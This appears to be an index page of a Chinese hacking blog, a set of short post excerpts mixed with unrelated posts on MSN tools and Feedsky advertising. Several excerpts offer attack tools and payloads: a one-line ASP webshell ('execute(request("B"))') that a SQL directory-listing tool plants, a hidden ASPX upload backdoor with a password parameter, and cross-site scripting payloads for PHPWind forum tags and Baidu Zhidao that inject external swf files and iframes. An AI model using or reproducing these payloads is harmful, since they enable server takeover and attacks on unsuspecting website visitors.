来源:BIN-Blog
功能简介:
1.该程序主要针对非SA用户.
2.得到SQL账号密码,通过调用XP_dirtree扩展,对SQL数据库所在的服务器进行列目录操作.
3.即使没有建表的权限也可以使用该程序.
4.增加了自动备份SHELL的功能.
5.感谢Venomancer 提供的精神上的支持!smoke
注意:备份的SHELL是< %execute(request("B"))% >或者自行修改!
图片(1)
图片(2)
阅读全文 »
Tags: WebShell
来源:BIN-Blog
写了一个WEB版的POST工具,可以向内网提交数据,其实在POST注入的时候发挥一定的效果!主要增加了对HTTP_X_FORWARDED_FOR 这个值的自定义提交.看着玩吧!
阅读全文 »
Tags: ASPX
来源:BIN-Blog
最近看见网上有人发了一个DIY.ASP的.net的版本,毕竟aspx的语法要求相对严谨,尽量减少代码的数量。
我也发一个上传的东东。其实可以完全做成C/S版的,不过感觉没什么必要。可以自定义文件名,用参数访问达到隐蔽的效果。没有做异常处理!
提示:访问的格式为 xxx.aspx?pass=bin
阅读全文 »
Tags: ASPX
我个人认为,MSN和QQ一个最大的区别就是QQ可以通过搜索在线用户来添加好友,但是MSN就必须需要知道对方的MSN地址才能加为好友,进行交流,所以大家的MSN上的朋友圈一般都比较小,我想这也是公司里面一般都只允许使用MSN的原因。
MSNNext 正是一个会扩展你MSN朋友圈的一个软件。
官方的介绍是这样的:
MSNNext是基于MSN的二度人脉网络,是充满爱心的互助服务平台,通过
阅读全文 »
Tags: FeedSky,
话题
鬼仔注:这个东西最近炒的很热,css调用两个图片,但是不清楚原理。
据说原来卖到8W,不过现在好像到处都有了。
刚才在xiaoguang那里看到,转过来,他的这个加了个简单的加密。
来源:XG'Blog
怎么用??
很简单 用记事本打开xg.htm现实内容如下:
阅读全文 »
Tags: ANI
信息来源:黑色技术小组
整理编辑:B.S.T
只要把后面的域名改成你所要跳转的域名就可以了…
支持wmv的论坛如下发帖:
[wmv=314,256,1]http://www.rootkit.com.cn/qq.swf?url=http://www.rootkit.com.cn[/wmv]
其他论坛跨站方法大家自己灵活运用了….
比如 mp3 wmv flash rm 等代码的支持格式都可以试一下
Tags: PHPWind,
跨站
跨站代码:
:</title><iframe src=http://www.huaidan.org/ width=400 height=300></iframe>
效果:
Tags: 百度知道,
跨站
ps:0ef29015
前段时间Feedsky推出话题广告,类似 ReviewMe 的服务,当时只是内测申请,我当时申请了。这两天看到很多blogger都说申请被通过,收到了邀请。我申请Feedsky的帐号用的是126的信箱,看看我的信箱里却没有信,后来仔细找找,结果在垃圾邮件里找到了,Feedsky的这封mail被126认为是垃圾邮件:
尊敬的Feedsky用户您好:
Feedsky话题广告已经向您开放,我们邀请邀请您的Feedsky帐户“[email protected]”进行话题广告的投放。 目前我们已开通公益话题邀您试用,稍后我们会有付费的广告相继推出,敬请等待!
阅读全文 »
Tags: FeedSky
